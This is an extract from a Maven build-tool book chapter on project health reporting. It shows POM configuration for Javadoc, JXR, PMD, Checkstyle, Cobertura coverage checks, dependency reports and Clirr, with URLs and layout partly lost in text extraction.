. there are cases where only some of the reports that the plugin produces will be required. <reporting> <plugins> <plugin> <groupId>org.. 173 . However.xml: .directory}/surefire-reports/perf </reportsDirectory> <outputName>surefire-report-perf</outputName> </configuration> <reports> <report>report</report> </reports> </reportSet> </reportSets> </plugin> </plugins> </reporting> . which is the reporting equivalent of the executions element in the build section. and cases where a particular report will be run more than once. once for unit tests and once for a set of performance tests.maven. by default all reports available in the plugin are executed once.apache.build.Assessing Project Health with Maven When you configure a reporting plugin. The configuration value is specific to the build stage When you are configuring the plugins to be used in the reporting section. Each report set can contain configuration. always place the configuration in the reporting section – unless one of the following is true: 1.directory}/surefire-reports/unit </reportsDirectory> <outputName>surefire-report-unit</outputName> </configuration> <reports> <report>report</report> </reports> </reportSet> <reportSet> <id>perf</id> <configuration> <reportsDirectory> ${project.build. consider if you had run Surefire twice in your build. Both of these cases can be achieved with the reportSets element. each time with a different configuration. you would include the following section in your pom. and that you had had generated its XML results to target/surefire-reports/unit and target/surefire-reports/perf respectively. The reports will not be included in the site 2.. and a list of reports to include..plugins</groupId> <artifactId>maven-surefire-report-plugin</artifactId> <reportSets> <reportSet> <id>unit</id> <configuration> <reportsDirectory> ${project. To generate two HTML reports for these results. For example.
who isn't interested in the state of the source code.xml file: .4. 6. However. Consider the following: • The commercial product. where the developer information is available. where the end user documentation is on a completely different server than the developer information. which are targeted at the developers. running mvn surefire-report:report will not use either of these configurations.. as with executions. 174 .plugins</groupId> <artifactId>maven-project-info-reports-plugin</artifactId> <reportSets> <reportSet> <reports> <report>mailing-list</report> <report>license</report> </reports> </reportSet> </reportSets> </plugin> . This may be confusing for the first time visitor.apache. It is also possible to include only a subset of the reports in a plugin. there's something subtly wrong with the project Web site. but quite separate to the end user documentation. but in the navigation there are reports about the health of the project. this customization will allow you to configure reports in a way that is just as flexible as your build.html. • The open source graphical application. depending on the project. add the following to the reporting section of the pom. This approach to balancing these competing requirements will vary. Separating Developer Reports From User Documentation After adding a report. • The open source reusable library. The reports in this list are identified by the goal names that would be used if they were run from the command line. While the defaults are usually sufficient. and most likely doesn't use Maven to generate it.. If you want all of the reports in a plugin to be generated.. where much of the source code and Javadoc reference is of interest to the end user.maven. and an inconvenience to the developer who doesn't want to wade through end user documentation to find out the current state of a project's test coverage. they must be enumerated in this list. The reports element in the report set is a required element. <plugin> <groupId>org.Better Builds with Maven Running mvn site with this addition will generate two Surefire reports: target/site/surefirereport-unit. outside of any report sets. Maven will use only the configuration that is specified in the plugin element itself. For example. to generate only the mailing list and license pages of the standard reports.html and target/site/surefire-report-perf.. which are targeted at an end user. On the entrance page there are usage instructions for Proficio. When a report is executed individually.
in some cases down to individual reports. However. Table 6-1 lists the content that a project Web site may contain. each section of the site needs to be considered. that can be updated between releases without risk of including new features. While there are some exceptions. and to maintain only one set of documentation. FAQs and general Web site End user documentation Source code reference material Project health and vitality reports This is the content that is considered part of the Web site rather than part of the documentation. You can maintain a stable branch. Javadoc) that in a library or framework is useful to the end user. It is also true of the project quality and vitality reports. For a single module library. The situation is different for end user documentation. and sometimes they are available for download separately. The Distributed column in the table indicates whether that form of documentation is typically distributed with the project. This is documentation for the end user including usage instructions and guides. This is typically true for the end user documentation. This is reference material (for example. as it is confusing for those reading the site who expect it to reflect the latest release. and a development branch where new features can be documented for when that version is released. Features that are available only in more recent releases should be marked to say when they were introduced. Table 6-1: Project Web site content types Content Description Updated Distributed Separated News. the Updated column indicates whether the content is regularly updated. including the end user documentation in the normal build is reasonable as it is closely tied to the source code reference. The Separated column indicates whether the documentation can be a separate module or project. It is good to update the documentation on the Web site between releases. the source code reference material and reports are usually generated from the modules that hold the source code and perform the build. the Javadoc and other reference material are usually distributed for reference as well. which are continuously published and not generally of interest for a particular release. It is important not to include documentation for features that don't exist in the last release. but usually not distributed or displayed in an application. source code references should be given a version and remain unchanged after being released. and not introducing incorrect documentation. These are the reports discussed in this chapter that display the current state of the project to the developers. like mailing list information and the location of the issue tracker and SCM are updated also. Yes No Yes Yes Yes No No Yes No Yes No No In the table. 175 . is to branch the end user documentation in the same way as source code. and the content's characteristics. Sometimes these are included in the main bundle. The best compromise between not updating between releases. This is true of the news and FAQs. which are based on time and the current state of the project. For libraries and frameworks.Assessing Project Health with Maven To determine the correct balance. It refers to a particular version of the software. regardless of releases. Some standard reports.
The resulting structure is shown in figure 6-4. a module is created since it is not related to the source code reference material. In this case. in most cases. The current structure of the project is shown in figure 6-3. the documentation and Web site should be kept in a separate module dedicated to generating a site. or maybe totally independent.proficio \ -DarchetypeArtifactId=maven-archetype-site-simple This archetype creates a very basic site in the user-guide subdirectory. the site currently contains end user documentation and a simple report. In the following example. but make it an independent project when it forms the overall site with news and FAQs. While these recommendations can help properly link or separate content according to how it will be used. and is not distributed with the project. Figure 6-3: The initial setup The first step is to create a module called user-guide for the end user documentation. This avoids including inappropriate report information and navigation elements. You would make it a module when you wanted to distribute it with the rest of the project. In Proficio.Better Builds with Maven However. you are free to place content wherever it best suits your project. which you can later add content to. It is important to note that none of these are restrictions placed on a project by Maven. This separated documentation may be a module of the main project. This is done using the site archetype : C:\mvnbook\proficio> mvn archetype:create -DartifactId=user-guide \ -DgroupId=com.mergere. 176 .mvnbook. you will learn how to separate the content and add an independent project for the news and information Web site.
177 . while optional.mergere. and the user guide to. the URL and deployment location were set to the root of the Web site:{pom.. First..version} </url> </site> </distributionManagement> .Assessing Project Health with Maven Figure 6-4: The directory layout with a user guide The next step is to ensure the layout on the Web site is correct. whether to maintain history or to maintain a release and a development preview..com/mvnbook/proficio/user-guide..mergere. the development documentation would go to that location.. <url> scp://mergere.xml file to change the site deployment url: . Under the current structure. edit the top level pom. Adding the version to the development documentation. is useful if you are maintaining multiple public versions.com/mvnbook/proficio. <distributionManagement> <site> . Previously. In this example.. the development documentation will be moved to a /reference/version subdirectory so that the top level directory is available for a user-facing web site.
maven. 183 . however the content pane is now replaced with a syntax-highlighted.apache.. A useful way to leverage the cross reference is to use the links given for each line number in a source file to point team mates at a particular piece of code. You can now run mvn site in proficio-core and see the Source Xref item listed in the Project Reports menu of the generated site. crossreferenced Java source file for the selected class... Including JXR as a permanent fixture of the site for the project is simple..xml: . if you don't have the project open in your IDE..Assessing Project Health with Maven Figure 6-6: An example source code cross reference Figure 6-6 shows an example of the cross reference.plugins</groupId> <artifactId>maven-jxr-plugin</artifactId> </plugin> . Or. The hyper links in the content pane can be used to navigate to other classes and interfaces within the cross reference. </plugins> </reporting> . <reporting> <plugins> <plugin> <groupId>org. Those familiar with Javadoc will recognize the framed navigation layout.. and can be done by adding the following to proficio/pom. the links can be used to quickly find the source belonging to a particular exception.
In the online mode. the default JXR configuration is sufficient.maven.sun. you should include it in proficio/pom. Using Javadoc is very similar to the JXR report and most other reports in Maven. will link both the JDK 1.xml. browsing source code is too cumbersome for the developer if they only want to know about how the API works.xml as a site report to ensure it is run every time the site is regenerated: . Again.4. the following configuration.org/ref/1. <plugin> <groupId>org.. 184 .Better Builds with Maven In most cases. One useful option to configure is links. Now that you have a source cross reference.. many of the other reports demonstrated in this chapter will be able to link to the actual code to highlight an issue.0-alpha-9/apidocs</link> </links> </configuration> </plugin> .. the Javadoc report is quite configurable. in target/site/apidocs.apache.plugins</groupId> <artifactId>maven-javadoc-plugin</artifactId> <configuration> <links> <link>. with most of the command line options of the Javadoc tool available. A Javadoc report is only as good as your Javadoc! Make sure you document the methods you intend to display in the report. However. The end result is the familiar Javadoc output. see the plugin reference at</groupId> <artifactId>maven-javadoc-plugin</artifactId> </plugin> .. so an equally important piece of reference material is the Javadoc report. and if possible use Checkstyle to ensure they are documented. this will link to an external Javadoc reference at a given URL.apache.apache.. when added to proficio/pom. For example.codehaus.2/docs/api</link> <link>. Unlike JXR.4 API documentation and the Plexus container API documentation used by Proficio: .org/plugins/maven-jxr-plugin/.com/j2se/1.. <plugin> <groupId>org..
This setting must go into the reporting section so that it is used for both reports and if the command is executed separately. but conversely to have the Javadoc closely related. of course!).xml by adding the following line: .lang. <configuration> <aggregate>true</aggregate> .Assessing Project Health with Maven If you regenerate the site in proficio-core with mvn site again. One option would be to introduce links to the other modules (automatically generated by Maven based on dependencies. the next section will allow you to start monitoring and improving its health. this setting is always ignored by the javadoc:jar goal. this simple change will produce an aggregated Javadoc and ignore the Javadoc report in the individual modules.Object.html.. Instead. ensuring that the deployed Javadoc corresponds directly to the artifact with which it is deployed for use in an IDE. this is not sufficient. When built from the top level project. but it results in a separate set of API documentation for each library in a multi-module build. </configuration> .String and java. Try running mvn clean javadoc:javadoc in the proficio directory to produce the aggregated Javadoc in target/site/apidocs/index... but this would still limit the available classes in the navigation as you hop from module to module.. However.. Edit the configuration of the existing Javadoc plugin in proficio/pom. 185 .. as well as any references to classes in Plexus. you'll see that all references to the standard JDK classes such as java. are linked to API documentation on the Sun website.lang. the Javadoc plugin provides a way to produce a single set of API documentation for the entire project. Since it is preferred to have discrete functional pieces separated into distinct modules. Now that the sample application has a complete reference for the source code. Setting up Javadoc has been very convenient.
which in turn reduces the risk that its accuracy will be affected by change) Maven has reports that can help with each of these health factors.7.sf. Figure 6-7: An example PMD report 186 . The result can help identify bugs.net/) • Checkstyle (. which is obtained by running mvn pmd:pmd.sf. and violations of a coding standard..Better Builds with Maven 6. Figure 6-7 shows the output of a PMD report on proficio-core.net/) • Tag List PMD takes a set of either predefined or user-defined rule sets and evaluates the rules across your Java source code. copy-and-pasted code. this is important for both the efficiency of other team members and also to increase the overall level of code comprehension. and this section will look at three: • PMD (.
.maven.apache. The “unused code” rule set will locate unused private fields. by passing the rulesets configuration to the plugin. such as unused methods and variables.xml</ruleset> <ruleset>/rulesets/unusedcode. Adding the default PMD report to the site is just like adding any other report – you can include it in the reporting section in the proficio/pom. methods.. 187 . if you configure these.. <plugin> <groupId>org. <plugin> <groupId>org. The “basic” rule set includes checks on empty blocks. redundant or unused import declarations.maven.xml</ruleset> </rulesets> </configuration> </plugin> .plugins</groupId> <artifactId>maven-pmd-plugin</artifactId> </plugin> ...plugins</groupId> <artifactId>maven-pmd-plugin</artifactId> <configuration> <rulesets> <ruleset>/rulesets/basic. some source files are identified as having problems that could be addressed. However.xml file: . since the JXR report was included earlier. to include the default rules. The default PMD report includes the basic. and imports rule sets. you must configure all of them – including the defaults explicitly. and the finalizer rule sets.Assessing Project Health with Maven As you can see.. Also. Adding new rule sets is easy.. The “imports” rule set will detect duplicate.apache. unused code. variables and parameters..xml</ruleset> <ruleset>/rulesets/finalizers. the line numbers in the report are linked to the actual source code so you can browse the issues.xml</ruleset> <ruleset>/rulesets/imports. add the following to the plugin configuration you declared earlier: . unnecessary statements and possible bugs – such as incorrect loop variables. For example.
html. unusedcode. If you've done all the work to select the right rules and are correcting all the issues being discovered.xml" /> <rule ref="/rulesets/imports. but exclude the “unused private field” rule. you could create a rule set with all the default rules. override the configuration in the proficio-core/pom.sf. and imports are useful in most scenarios and easily fixed. you need to make sure it stays that way. select the rules that apply to your own project. Or.. <reporting> <plugins> <plugin> <groupId>org.apache. create a file in the proficio-core directory of the sample application called src/main/pmd/custom. Start small.html: • • Pick the rules that are right for you.xml" /> <rule ref="/rulesets/unusedcode.. with the following content: <?xml version="1. basic. 188 . For example. you may use the same rule sets in a number of projects.maven. For PMD. In either case. but not others. see the instructions on the PMD Web site at. try the following guidelines from the Web site at. To try this. It is also possible to write your own rules if you find that existing ones do not cover recurring problems in your source code.net/bestpractices. you can choose to create a custom rule set.plugins</groupId> <artifactId>maven-pmd-plugin</artifactId> <configuration> <rulesets> <ruleset>${basedir}/src/main/pmd/custom. For more examples on customizing the rule sets.xml"> <exclude name="UnusedPrivateField" /> </rule> </ruleset> To use this rule set.Better Builds with Maven You may find that you like some rules in a rule set.xml file by adding: . There is no point having hundreds of violations you won't fix.xml</ruleset> </rulesets> </configuration> </plugin> </plugins> </reporting> . and add more as needed.net/howtomakearuleset. One important question is how to select appropriate rules..sf.. From this starting.xml.0"?> <ruleset name="custom"> <description> Default rules. no unused private field warning </description> <rule ref="/rulesets/basic.
</plugins> </build> You may have noticed that there is no configuration here. [INFO] --------------------------------------------------------------------------- Before correcting these errors.Assessing Project Health with Maven Try this now by running mvn pmd:check on proficio-core. fix the errors in the src/main/java/com/mergere/mvnbook/proficio/DefaultProficio. If you need to run checks earlier.. You will see that the build fails.. add the following section to the proficio/pom. but recall from Configuring Reports and Checks section of this chapter that the reporting configuration is applied to the build as well. By default. you should include the check in the build. To do so. This is done by binding the goal to the build life.plugins</groupId> <artifactId>maven-pmd-plugin</artifactId> <executions> <execution> <goals> <goal>check</goal> </goals> </execution> </executions> </plugin> . which occurs after the packaging phase. To correct this. the pmd:check goal is run in the verify phase.xml file: <build> <plugins> <plugin> <groupId>org. try running mvn verify in the proficio-core directory.maven.apache. you could add the following to the execution block to ensure that the check runs just after all sources exist: <phase>process-sources</phase> To test this new setting.java file by adding a //NOPMD comment to the unused variables and method: 189 . so that it is regularly tested.
can make the check optional for developers. // NOPMD . int j. Figure 6-8: An example CPD report 190 .Better Builds with Maven . there is one that is in a separate report. and will appear as “CPD report” in the Project Reports menu. If you run mvn verify again.. While this check is very useful. it can be slow and obtrusive during general development. This is the CPD. // Trigger PMD and checkstyle int i. which is executed only in an appropriate environment. While the PMD report allows you to run a number of different rules... or copy/paste detection report... // NOPMD ...This report is included by default when you enable the PMD plugin in your reporting section. See Continuous Integration with Continuum section in the next chapter for information on using profiles and continuous integration.. adding the check to a profile. and it includes a list of duplicate code fragments discovered across your entire source base. An example report is shown in figure 6-8. but mandatory in an integration environment. private void testMethod() // NOPMD { } . For that reason. the build will succeed.
and a commercial product called Simian (. or to enforce a check will depend on the environment in which you are working. resulting in developers attempting to avoid detection by making only slight modifications. With this setting you can fine tune the size of the copies detected. There are other alternatives for copy and paste detection.redhillconsulting. which defaults to 100. 191 . • Use it to check code formatting and selected other problems.net/availablechecks. in many ways. It was originally designed to address issues of format and style.html. Whether to use the report only. This may not give you enough control to effectively set a rule for the source code. refer to the list on the Web site at. If you need to learn more about the available modules in Checkstyle. Depending on your environment.au/products/simian/). rather than identifying a possible factoring of the source code.Assessing Project Health with Maven In a similar way to the main check. the CPD report contains only one variable to configure: minimumTokenCount. and rely on other tools for detecting other problems. Some of the extra summary information for overall number of errors and the list of checks used has been trimmed from this display. such as Checkstyle. Figure 6-9 shows the Checkstyle report obtained by running mvn checkstyle:checkstyle from the proficio-core directory. Checkstyle is a tool that is. • Use it to check code formatting and to detect other problems exclusively This section focuses on the first usage scenario. and still rely on other tools for greater coverage. Simian can also be used through Checkstyle and has a larger variety of configuration options for detecting duplicate source code. but has more recently added checks for other code issues. you may choose to use it in one of the following ways: • Use it to check code formatting only. However.sf. similar to PMD. pmd:cpd-check can be used to enforce a failure if duplicate source code is found.com.
the rules used are those of the Sun Java coding conventions. so to include the report in the site and configure it to use the Maven style. add the following to the reporting section of proficio/pom. with a link to the corresponding source line – if the JXR report was enabled. but Proficio is using the Maven team's code style.. warnings or errors is listed in a summary.apache.maven. and then the errors are shown.Better Builds with Maven Figure 6-9: An example Checkstyle report You'll see that each file with notices. This style is also bundled with the Checkstyle plugin.plugins</groupId> <artifactId>maven-checkstyle-plugin</artifactId> <configuration> <configLocation>config/maven_checks. That's a lot of errors! By default.xml</configLocation> </configuration> </plugin> 192 .xml: . <plugin> <groupId>org..
0. or would like to use the additional checks introduced in Checkstyle 3. will look through your source code for known tags and provide a report on those it finds. It is a good idea to reuse an existing Checkstyle configuration for your project if possible – if the style you use is common.apache.apache. By default. and to parameterize the Checkstyle configuration for creating a baseline organizational standard that can be customized by individual projects. as explained at. However.sf. While this chapter will not go into an example of how to do this.0 and above. This report.org/turbine/common/codestandards.org/plugins/maven-checkstyle-plugin/tips. It is also possible to share a Checkstyle configuration among multiple projects.com/docs/codeconv/. one or the other will be suitable for most people. the Checkstyle documentation provides an excellent reference at. 193 .xml Description Reference Sun Java Coding Conventions Maven team's coding conventions Conventions from the Jakarta Turbine project Conventions from the Apache Avalon project. filter the results.xml config/turbine_checks. Before completing this section it is worth mentioning the Tag List plugin.net/config. if you have developed a standard that differs from these. The Checkstyle plugin itself has a large number of configuration options that allow you to customize the appearance of the report.org/guides/development/guidem2-development.xml No longer online – the Avalon project has closed.Assessing Project Health with Maven Table 6-3 shows the configurations that are built into the Checkstyle plugin.html. or a resource within a special dependency also.html#Maven%20Code%20Style. The built-in Sun and Maven standards are quite different. known as “Task List” in Maven 1.xml config/avalon_checks. The configLocation parameter can be set to a file within your build. a URL.html.apache. then it is likely to be more readable and easily learned by people joining your project.sun. These checks are for backwards compatibility only. you will need to create a Checkstyle configuration. and typically. this will identify the tags TODO and @todo in the comments of your source code.html config/maven_checks. Table 6-3: Built-in Checkstyle configurations Configuration config/sun_checks.
and more plugins are being added every day. FIXME. While you are writing your tests. Cobertura (. add the following to the reporting section of proficio/pom.codehaus. JavaNCSS and JDepend. 6.mojo</groupId> <artifactId>taglist-maven-plugin</artifactId> <configuration> <tags> <tag>TODO</tag> <tag>@todo</tag> <tag>FIXME</tag> <tag>XXX</tag> </tags> </configuration> </plugin> . will ignore these failures when generated to show the current test state. have beta versions of plugins available from the. PMD...codehaus. or XXX in your source code. In addition to that. Another critical technique is to determine how much of your source code is covered by the test execution.. you saw that tests are run before the packaging of the library or application for distribution.. 194 . Monitoring and Improving the Health of Your Tests One of the important (and often controversial) features of Maven is the emphasis on testing as part of the production of your code. it can be a useful report for demonstrating the number of tests available and the time it takes to run certain tests for a package. As you learned in section 6.sf. Knowing whether your tests pass is an obvious and important assessment of their health. using this report on a regular basis can be very helpful in spotting any holes in the test plan. <plugin> <groupId>org. the report (run either on its own.xml: . or as part of the site).2. At the time of writing. Failing the build is still recommended – but the report allows you to provide a better visual representation of the results. Checkstyle. for assessing coverage.org/ project at the time of this writing. In the build life cycle defined in Chapter 2.Better Builds with Maven To try this plugin. Some other similar tools. and Tag List are just three of the many tools available for assessing the health of your project's source code. however this plugin is a more convenient way to get a simple report of items that need to be addressed at some point later in time. Setting Up the Project Web Site. such as FindBugs. There are additional testing stages that can occur after the packaging step to verify that the assembled package works under other circumstances. While the default Surefire configuration fails the build if the tests fail. it is easy to add a report to the Web site that shows the results of the tests that have been run. based on the theory that you shouldn't even try to use something before it has been tested. @todo.8. This configuration will locate any instances of TODO. It is actually possible to achieve this using Checkstyle or PMD rules.net) is the open source tool best integrated with Maven.
or for which all possible branches were not executed. and a line-by-line coverage analysis of each source file. For example. For a source file.html. Figure 6-10 shows the output that you can view in target/site/cobertura/index. you'll notice the following markings: • Unmarked lines are those that do not have any executable code associated with them. • • Unmarked lines with a green number in the second column are those that have been completely covered by the test execution. Each line with an executable statement has a number in the second column that indicates during the test run how many times a particular statement was run. The report contains both an overall summary. in the familiar Javadoc style framed layout. a branch is an if statement that can behave differently depending on whether the condition is true or false.Assessing Project Health with Maven To see what Cobertura is able to report. Lines in red are statements that were not executed (if the count is 0). Figure 6-10: An example Cobertura report 195 . This includes method and class declarations. comments and white space. run mvn cobertura:cobertura in the proficio-core directory of the sample application.
Add the following to the reporting section of proficio/pom.. 196 . <build> <plugins> <plugin> <groupId>org. The Cobertura report doesn't have any notable configuration.. If you now run mvn site under proficio-core. If you now run mvn clean in proficio-core.codehaus. the report will be generated in target/site/cobertura/index.xml: . High numbers (for example. <plugin> <groupId>org.ser file is deleted. To ensure that this happens. add the following to the build section of proficio/pom. you might consider having PMD monitor it.. might indicate a method should be re-factored into simpler pieces.. If this is a metric of interest. which measures the number of branches that occur in a particular method.mojo</groupId> <artifactId>cobertura-maven-plugin</artifactId> </plugin> . there is another useful setting to add to the build section... you'll see that the cobertura. While not required. as it can be hard to visualize and test the large number of alternate code paths.ser.html.Better Builds with Maven The complexity indicated in the top right is the cyclomatic complexity of the methods in the class. the database used is stored in the project directory as cobertura.. and is not cleaned with the rest of the project. over 10). as well as the target directory.codehaus.xml: .. so including it in the site is simple.mojo</groupId> <artifactId>cobertura-maven-plugin</artifactId> <executions> <execution> <id>clean</id> <goals> <goal>clean</goal> </goals> </execution> </executions> </plugin> </plugins> </build> . Due to a hard-coded path in Cobertura. The Cobertura plugin also contains a goal called cobertura:check that is used to ensure that the coverage of your source code is maintained at a certain percentage.
If you now run mvn verify under proficio-core.. add a configuration and another execution to the build plugin definition you added above when cleaning the Cobertura database: . the check passes. the configuration will be applied. <execution> <id>check</id> <goals> <goal>check</goal> </goals> </execution> </executions> .. You would have seen in the previous examples that there were some lines not covered. However. The Surefire report may also re-run tests if they were already run – both of these are due to a limitation in the way the life cycle is constructed that will be improved in future versions of Maven. <configuration> <check> <totalLineRate>80</totalLineRate> . This ensures that if you run mvn cobertura:check from the command line. If you run mvn verify again. looking through the report. and the tests are re-run using those class files instead of the normal ones (however. You can do this for Proficio to have the tests pass by changing the setting in proficio/pom. Normally.. so running the check fails. You'll notice that your tests are run twice. you may decide that only some exceptional cases are untested... these are instrumented in a separate directory. as in the Proficio example. and decide to reduce the overall average required...Assessing Project Health with Maven To configure this goal for Proficio. and 100% branch coverage rate. This wouldn't be the case if it were associated with the life-cycle bound check execution. Note that the configuration element is outside of the executions..xml: . This is because Cobertura needs to instrument your class files. The rules that are being used in this configuration are 100% overall line coverage rate.. you would add unit tests for the functions that are missing tests.. so are not packaged in your application). <configuration> <check> <totalLineRate>100</totalLineRate> <totalBranchRate>100</totalBranchRate> </check> </configuration> <executions> . the check will be performed. 197 .
org/plugins/maven-clover-plugin/. This will allow for some constructs to remain untested. as it will discourage writing code to handle exceptional cases that aren't being tested. exceptional cases – and that's certainly not something you want! The settings above are requirements for averages across the entire source tree. although not yet integrated with Maven directly. It is just as important to allow these exceptions. You may want to enforce this for each file individually as well. It behaves very similarly to Cobertura. These reports won't tell you if all the features have been implemented – this requires functional or acceptance testing. and you can evaluate it for 30 days when used in conjunction with Maven. Remember. It also won't tell you whether the results of untested input values produce the correct results. and setting the total rate higher than both. 198 . and get integration with these other tools for free. the easiest way to increase coverage is to remove code that handles untested. there is more to assessing the health of tests than success and coverage.sf. may be of assistance there. To conclude this section on testing. For more information.net). it is possible for you to write a provider to use the new tool. so that they understand and agree with the choice. It is also possible to set requirements on individual packages or classes using the regexes parameter.Better Builds with Maven These settings remain quite demanding though. see the Clover plugin reference on the Maven Web site at support is also available. Consider setting any package rates higher than the per-class rate. Tools like Jester (. Some helpful hints for determining the right code coverage settings are: • • • • • • Like all metrics. as it is to require that the other code be tested. refer to the Cobertura plugin configuration reference at. only allowing a small number of lines to be untested. Remain flexible – consider changes over time rather than hard and fast rules. If you have another tool that can operate under the Surefire framework. The best known commercial offering is Clover. Choose to reduce coverage requirements on particular classes or packages rather than lowering them globally.codehaus. Don't set it too high. which is very well integrated with Maven as well. Set some known guidelines for what type of code can remain untested. involve the whole development team in the decision. In both cases. or as the average across each package. and at the time of writing experimental JUnit 4. Surefire supports tests written with TestNG. Cobertura is not the only solution available for assessing test coverage. For example. it is worth noting that one of the benefits of Maven's use of the Surefire abstraction is that the tools above will work for any type of runner introduced. Don't set it too low.apache. Choosing appropriate settings is the most difficult part of configuring any of the reporting metrics in Maven. as it will become a minimum benchmark to attain and rarely more. these reports work unmodified with those test types. Jester mutates the code that you've already determined is covered and checks that it causes the test to fail when run a second time with the wrong code. For more information. using lineRate and branchRate. Of course. using packageLineRate and packageBranchRate. such as handling checked exceptions that are unexpected in a properly configured system and difficult to test.org/cobertura-maven-plugin.
and a number of other features such as scoping and version selection. Monitoring and Improving the Health of Your Dependencies Many people use Maven primarily as a dependency manager. and browse to the file generated in target/site/dependencies. Maven 2. run mvn site in the proficio-core directory.9. Figure 6-11: An example dependency report 199 .html. but any projects that depend on your project. While this is only one of Maven's features.Assessing Project Health with Maven 6. If you haven't done so already. The result is shown in figure 6-11. This brought much more power to Maven's dependency mechanism.0 introduced transitive dependencies. but does introduce a drawback: poor dependency maintenance or poor scope and version selection affects not only your own project. the full graph of a project's dependencies can quickly balloon in size and start to introduce conflicts. Left unchecked. used well it is a significant time saver. The first step to effectively maintaining your dependencies is to review the standard report included with the Maven site. where the dependencies of dependencies are included in a build.
Currently. This can be quite difficult to read. or an incorrect scope – and choose to investigate its inclusion. here is the resolution process of the dependencies of proficio-core (some fields have been omitted for brevity): proficio-core:1. run mvn site from the base proficio directory. this requires running your build with debug turned on. local scope test wins) proficio-api:1. To see the report for the Proficio project. Another report that is available is the “Dependency Convergence Report”. but that it is overridden by the test scoped dependency in proficio-core. such as mvn -X package. so at the time of this writing there are two features in progress that are aimed at helping in this area: • • The Maven Repository Manager will allow you to navigate the dependency tree through the metadata stored in the Ibiblio repository. A dependency graphing plugin that will render a graphical representation of the information. This will output the dependency tree as it is calculated. It's here that you might see something that you didn't expect – an extra dependency. and that plexus-container-default attempts to introduce junit as a compile dependency.0-SNAPSHOT junit:3. an incorrect version. and why. and must be updated before the project can be released. which indicates dependencies that are in development.html will be created. It also includes some statistics and reports on two important factors: • Whether the versions of dependencies used for each module is in alignment. but appears in a multi-module build only. • 200 . The report shows all of the dependencies included in all of the modules within the project.0-SNAPSHOT (selected for compile) proficio-model:1. using indentation to indicate which dependencies introduce other dependencies. but more importantly in the second section it will list all of the transitive dependencies included through those dependencies. This helps ensure your build is consistent and reduces the probability of introducing an accidental incompatibility.8.8.1-alpha-2 (selected for compile) junit:3.1 (selected for test) plexus-container-default:1.Better Builds with Maven This report shows detailed information about your direct dependencies.1 (not setting scope to: compile.4 (selected for compile) classworlds:1. Whether there are outstanding SNAPSHOT dependencies in the build. as well as comments about what versions and scopes are selected.0-SNAPSHOT (selected for compile) Here you can see that. proficio-model is introduced by proficio-api. The file target/site/dependencyconvergence. for example. For example.0.0-alpha-9 (selected for compile) plexus-utils:1. and is shown in figure 6-12. This report is also a standard report.
try the following recommendations for your dependencies: • • • • Look for dependencies in your project that are no longer used Check that the scope of your dependencies are set correctly (to test if only used for unit tests. This is particularly the case for dependencies that are optional and unused by your project. Use a range of supported dependency versions. Add exclusions to dependencies to remove poorly defined dependencies from the tree.Assessing Project Health with Maven Figure 6-12: The dependency convergence report These reports are passive – there are no associated checks for them. However. 201 . they can provide basic help in identifying the state of your dependencies once you know what to find. or runtime if it is needed to bundle with or run the application but not for compiling your source code). rather than using the latest available. To improve your project's health and the ability to reuse it as a dependency itself. You can control what version is actually used by declaring the dependency version in a project that packages or runs the application. declaring the absolute minimum supported as the lower boundary.
Monitoring and Improving the Health of Your Releases Releasing a project is one of the most important procedures you will perform. 6. there is no verification that a library is binary-compatible – incompatibility will be discovered only when there's a failure.Better Builds with Maven Given the importance of this task. but then expected to continue working as they always have. Libraries will often be substituted by newer versions to obtain new features or bug fixes. Figure 6-13: An example Clirr report This is particularly important if you are building a library or framework that will be consumed by developers outside of your own project. but it is often tedious and error prone. specification dependencies that let you depend on an API and manage the implementation at runtime. Because existing libraries are not recompiled every time a version is changed. An important tool in determining whether a project is ready to be released is Clirr (). While the next chapter will go into more detail about how Maven can help automate that task and make it more reliable. and more.10. 202 . Clirr detects whether the current version of a library has introduced any binary incompatibilities with the previous release. Two that are in progress were listed above. An example Clirr report is shown in figure 6-13. more tools are needed in Maven. and the information released with it. this section will focus on improving the quality of the code released. Catching these before a release can eliminate problems that are quite difficult to resolve once the code is “in the wild”. but there are plans for more: • • A class analysis plugin that helps identify dependencies that are unused in your current project Improved dependency management features including different mechanisms for selecting versions that will allow you to deal with conflicting versions.sf.
add the following to the reporting section of proficio-api/pom. [INFO] [INFO] [INFO] [INFO] [INFO] . For example.8 release.codehaus. You can change the version used with the comparisonVersion parameter. While methods of marking incompatibility are planned for future versions. that is before the current development version. By default. by setting the minSeverity parameter. run the following command: mvn clirr:clirr -DcomparisonVersion=0. If you run either of these commands..xml: ...mojo</groupId> <artifactId>clirr-maven-plugin</artifactId> <configuration> <minSeverity>info</minSeverity> </configuration> </plugin> </plugins> </reporting> . As a project grows. the answer here is clearly – yes.Assessing Project Health with Maven But does binary compatibility apply if you are not developing a library for external consumption? While it may be of less importance.8 203 . where the dependency mechanism is based on the assumption of binary compatibility between versions. Maven currently works best if any version of an artifact is backwards compatible. the interactions between the project's own components will start behaving as if they were externally-linked. However. the report will be generated in target/site/clirrreport. This gives you an overview of all the changes since the last release.9 ------------------------------------------------------------BUILD SUCCESSFUL ------------------------------------------------------------- This version is determined by looking for the newest release in repository. you'll notice that Maven reports that it is using version 0. back to the first release.. If you run mvn site in proficio-api. [clirr:clirr] Comparing to version: 0. you can configure the plugin to show all informational messages. To see this in action.. This is particularly true in a Maven-based environment. to compare the current code to the 0.... the Clirr report shows only errors and warnings.html. <reporting> <plugins> <plugin> <groupId>org.9 of proficio-api against which to compare (and that it is downloaded if you don't have it already): . Different modules may use different versions. even if they are binary compatible. or a quick patch may need to be made and a new version deployed into an existing application. You can obtain the same result by running the report on its own using mvn clirr:clirr.
if the team is prepared to do so. To add the check to the proficio-api/pom.. If it is the only one that the development team will worry about breaking. delegating the code. there is nothing in Java preventing them from being used elsewhere. since this early development version had a different API. the harder they are to change as adoption increases. You'll notice there are a more errors in the report.. Even if they are designed only for use inside the project. then there is no point in checking the others – it will create noise that devalues the report's content in relation to the important components.mojo</groupId> <artifactId>clirr-maven-plugin</artifactId> <executions> <execution> <goals> <goal>check</goal> </goals> </execution> </executions> </plugin> . add the following to the build section: . In this instance.. However. <build> <plugins> <plugin> <groupId>org. to discuss and document the practices that will be used. Like all of the quality metrics.. it is important to agree up front. and it can assist in making your own project more stable. and later was redesigned to make sure that version 1. rather than removing or changing the original API and breaking binary compatibility. The longer poor choices remain. however you can see the original sources by extracting the Code_Ch06-2. It is best to make changes earlier in the development cycle. on the acceptable incompatibilities. Once a version has been released that is intended to remain binary-compatible going forward.codehaus. The Clirr plugin is also capable of automatically checking for introduced incompatibilities through the clirr:check goal. it is a 